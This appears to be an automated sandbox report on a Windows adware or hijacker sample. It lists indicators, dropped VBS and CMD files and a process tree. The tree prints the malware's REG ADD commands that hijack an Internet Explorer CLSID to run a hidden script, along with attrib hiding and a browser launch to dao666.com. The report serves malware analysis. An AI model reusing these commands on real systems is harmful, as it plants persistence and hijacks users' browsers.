bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb

Analysis

max time kernel
142s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
02/12/2022, 17:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe
Size

356KB
MD5

a54cc87295c32b81d5c3ccb7fe4f22ff
SHA1

3792b224bf89d8682a256431fed4b343dd61fe36
SHA256

bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb
SHA512

cbe47a49544d78f195ff7bb345f006b879eb1de0d803ecb7922193915887bbc8fe89a418f6a092055e5841129cc46faca45c6018f637477df6d0a595b9bfdb5b
SSDEEP

6144:Fu2urzh9xu/XkauF5JgIy2uaufWG7Jb1juH5Ek8rbyytnhPAY2z+VWpRFd9rJiPz:Futrzh9xOXkWPkufWG7GZENfNhDi7rJ6

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 4 IoCs

pid	Process
3960	msn.exe
4208	ks.exe
4608	ks.exe
1800	ks.exe

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

pid	Process
4724	attrib.exe
4440	attrib.exe
5088	attrib.exe
380	attrib.exe
704	attrib.exe
3336	attrib.exe
4792	attrib.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	msn.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	ks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	ks.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops file in Program Files directory 33 IoCs

description	ioc	Process
File created	C:\Program Files\software\Microsoft\win.vbs	cmd.exe
File opened for modification	C:\Program Files\software\Internet Expl0rer.lnk	cmd.exe
File opened for modification	C:\Program Files\software\36OSE.vbs	attrib.exe
File opened for modification	C:\Program Files\software\tool.cmd	attrib.exe
File created	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\Windows NT\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\Microsoft\win.vbs	cmd.exe
File opened for modification	C:\Program Files\software\fav\tao.ico	cmd.exe
File created	C:\Program Files\software\software.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows NT\360SE.vbs	cmd.exe
File created	C:\Program Files\software\360SE.vbs	cmd.exe
File created	C:\Program Files\software\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\360.cmd	attrib.exe
File created	C:\Program Files\software\fav\fav.cmd	cmd.exe
File opened for modification	C:\Program Files\software\361.cmd	cmd.exe
File opened for modification	C:\Program Files\software\36OSE.vbs	cmd.exe
File created	C:\Program Files\software\Internet Expl0rer.lnk	cmd.exe
File created	C:\Program Files\Windows NT\36OSE.vbs	cmd.exe
File created	C:\Program Files\software\fav\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\360.cmd	cmd.exe
File created	C:\Program Files\software\361.cmd	cmd.exe
File opened for modification	C:\Program Files\software\Microsoft\win.vbs	attrib.exe
File opened for modification	C:\Program Files\software\360SE.vbs	attrib.exe
File opened for modification	C:\Program Files\software\software.vbs	cmd.exe
File created	C:\Program Files\software\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\software\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\software\fav\fav.cmd	attrib.exe
File opened for modification	C:\Program Files\software\361.cmd	attrib.exe
File created	C:\Program Files\Windows NT\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\xerox\tao.ico	cmd.exe
File opened for modification	C:\Program Files\software\fav\fav.cmd	cmd.exe
File created	C:\Program Files\software\360.cmd	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
5016	sc.exe
4260	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 41 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1484497660"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "377004929"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31000733"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 704f1b599d08d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31000733"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1482466084"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0f8365a9d08d901	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d94ca1e5089dd64595ab7fa2b221bdb100000000020000000000106600000001000020000000c9b9da7249125644fa5841c5baca62d0919db259d842cc8dee0038396c54ffd1000000000e8000000002000020000000595f1ddd26aba3e4a3de7cc5c514a96a8dc93c755767b600c74a084dd7a71b1b200000000d07581af9497497a8ed99ae6cb933c4411167a9f02f2476cd6580bffd7a378940000000e8795c740aa014c02c9c26082060a2c91bf7f8d97c0a3e0cb70ed0e0d6d6ccedbf559cab1fa4615fcb686671ade061d914fb28bd15cf4b18dd77f7c4d159a4da	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DOMStorage\dao666.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31000733"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{831096D0-7490-11ED-89AC-DAE60F07E07D} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1482466084"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\dao666.com	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DOMStorage\dao666.com\NumberOfSubdomains = "1"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1484497660"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000d94ca1e5089dd64595ab7fa2b221bdb100000000020000000000106600000001000020000000b521ec93c5af44c96511c943dd0e99ecb1db25abf7b202965a301c89ee826cd2000000000e8000000002000020000000d590157d6cbb87de5b75779551d7fbbb7a9314baf3386c7770bd9686d70d46cb20000000fce6dc75ad842bb43ed4d2e94a26f1ed995cbaa0a5834477f8f0ff1e5b1dfbe04000000010f547948d38f72e89b6045948ed730df9e808a2a9d2996fb25c21b6b5df0c26a9f3759ab4e5bd93f06252296b3ce1044e682d21b0e5a8e72d754ab128064d6a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31000733"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Modifies registry class 41 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\LocalizedString = "@shdoclc.dll,-880"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings	bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\HideOnDesktopPerUser	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InfoTip = "@shdoclc.dll,-880"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\software\\Microsoft\\win.vbs"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\Attributes = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell\╩⌠╨╘(&R)\Command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32\	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3380	iexplore.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
3380	iexplore.exe
3380	iexplore.exe
392	IEXPLORE.EXE
392	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4772 wrote to memory of 4712	4772	bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe	81
PID 4772 wrote to memory of 4712	4772	bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe	81
PID 4772 wrote to memory of 4712	4772	bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe	81
PID 4712 wrote to memory of 3508	4712	WScript.exe	83
PID 4712 wrote to memory of 3508	4712	WScript.exe	83
PID 4712 wrote to memory of 3508	4712	WScript.exe	83
PID 3508 wrote to memory of 3380	3508	cmd.exe	86
PID 3508 wrote to memory of 3380	3508	cmd.exe	86
PID 4712 wrote to memory of 3264	4712	WScript.exe	88
PID 4712 wrote to memory of 3264	4712	WScript.exe	88
PID 4712 wrote to memory of 3264	4712	WScript.exe	88
PID 3264 wrote to memory of 4240	3264	cmd.exe	90
PID 3264 wrote to memory of 4240	3264	cmd.exe	90
PID 3264 wrote to memory of 4240	3264	cmd.exe	90
PID 3264 wrote to memory of 3584	3264	cmd.exe	91
PID 3264 wrote to memory of 3584	3264	cmd.exe	91
PID 3264 wrote to memory of 3584	3264	cmd.exe	91
PID 3264 wrote to memory of 4608	3264	cmd.exe	92
PID 3264 wrote to memory of 4608	3264	cmd.exe	92
PID 3264 wrote to memory of 4608	3264	cmd.exe	92
PID 3264 wrote to memory of 3852	3264	cmd.exe	93
PID 3264 wrote to memory of 3852	3264	cmd.exe	93
PID 3264 wrote to memory of 3852	3264	cmd.exe	93
PID 3264 wrote to memory of 3200	3264	cmd.exe	94
PID 3264 wrote to memory of 3200	3264	cmd.exe	94
PID 3264 wrote to memory of 3200	3264	cmd.exe	94
PID 3264 wrote to memory of 1828	3264	cmd.exe	95
PID 3264 wrote to memory of 1828	3264	cmd.exe	95
PID 3264 wrote to memory of 1828	3264	cmd.exe	95
PID 3264 wrote to memory of 1008	3264	cmd.exe	96
PID 3264 wrote to memory of 1008	3264	cmd.exe	96
PID 3264 wrote to memory of 1008	3264	cmd.exe	96
PID 3380 wrote to memory of 392	3380	iexplore.exe	97
PID 3380 wrote to memory of 392	3380	iexplore.exe	97
PID 3380 wrote to memory of 392	3380	iexplore.exe	97
PID 3264 wrote to memory of 4076	3264	cmd.exe	98
PID 3264 wrote to memory of 4076	3264	cmd.exe	98
PID 3264 wrote to memory of 4076	3264	cmd.exe	98
PID 3264 wrote to memory of 1468	3264	cmd.exe	99
PID 3264 wrote to memory of 1468	3264	cmd.exe	99
PID 3264 wrote to memory of 1468	3264	cmd.exe	99
PID 3264 wrote to memory of 3588	3264	cmd.exe	100
PID 3264 wrote to memory of 3588	3264	cmd.exe	100
PID 3264 wrote to memory of 3588	3264	cmd.exe	100
PID 3264 wrote to memory of 1016	3264	cmd.exe	101
PID 3264 wrote to memory of 1016	3264	cmd.exe	101
PID 3264 wrote to memory of 1016	3264	cmd.exe	101
PID 3264 wrote to memory of 1224	3264	cmd.exe	102
PID 3264 wrote to memory of 1224	3264	cmd.exe	102
PID 3264 wrote to memory of 1224	3264	cmd.exe	102
PID 3264 wrote to memory of 4060	3264	cmd.exe	103
PID 3264 wrote to memory of 4060	3264	cmd.exe	103
PID 3264 wrote to memory of 4060	3264	cmd.exe	103
PID 3264 wrote to memory of 4456	3264	cmd.exe	104
PID 3264 wrote to memory of 4456	3264	cmd.exe	104
PID 3264 wrote to memory of 4456	3264	cmd.exe	104
PID 3264 wrote to memory of 1780	3264	cmd.exe	105
PID 3264 wrote to memory of 1780	3264	cmd.exe	105
PID 3264 wrote to memory of 1780	3264	cmd.exe	105
PID 3264 wrote to memory of 4468	3264	cmd.exe	106
PID 3264 wrote to memory of 4468	3264	cmd.exe	106
PID 3264 wrote to memory of 4468	3264	cmd.exe	106
PID 3264 wrote to memory of 4112	3264	cmd.exe	107
PID 3264 wrote to memory of 4112	3264	cmd.exe	107

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4724	attrib.exe
4440	attrib.exe
5088	attrib.exe
380	attrib.exe
704	attrib.exe
3336	attrib.exe
4792	attrib.exe

C:\Users\Admin\AppData\Local\Temp\bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe
"C:\Users\Admin\AppData\Local\Temp\bbf9222688683f6c73451b8ab123ef4425c0235b072f8a15e8e8f4cf45b913cb.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup_free_u.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4712
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?yinghuochong
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3508
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?yinghuochong
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3380
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3380 CREDAT:17410 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:392
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3264
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:4240
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}"
      4⤵
      Modifies registry class
      PID:3584
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}" /v "InfoTip" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      Modifies registry class
      PID:4608
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}" /v "LocalizedString" /t REG_SZ /d "@shdoclc.dll,-880" /f
      4⤵
      Modifies registry class
      PID:3852
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon"
      4⤵
      Modifies registry class
      PID:3200
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:1828
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32"
      4⤵
      Modifies registry class
      PID:1008
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      Modifies registry class
      PID:4076
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:1468
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{00000108-0000-0010-8000-00AA006DAAAA}\shell"
      4⤵
      Modifies registry class
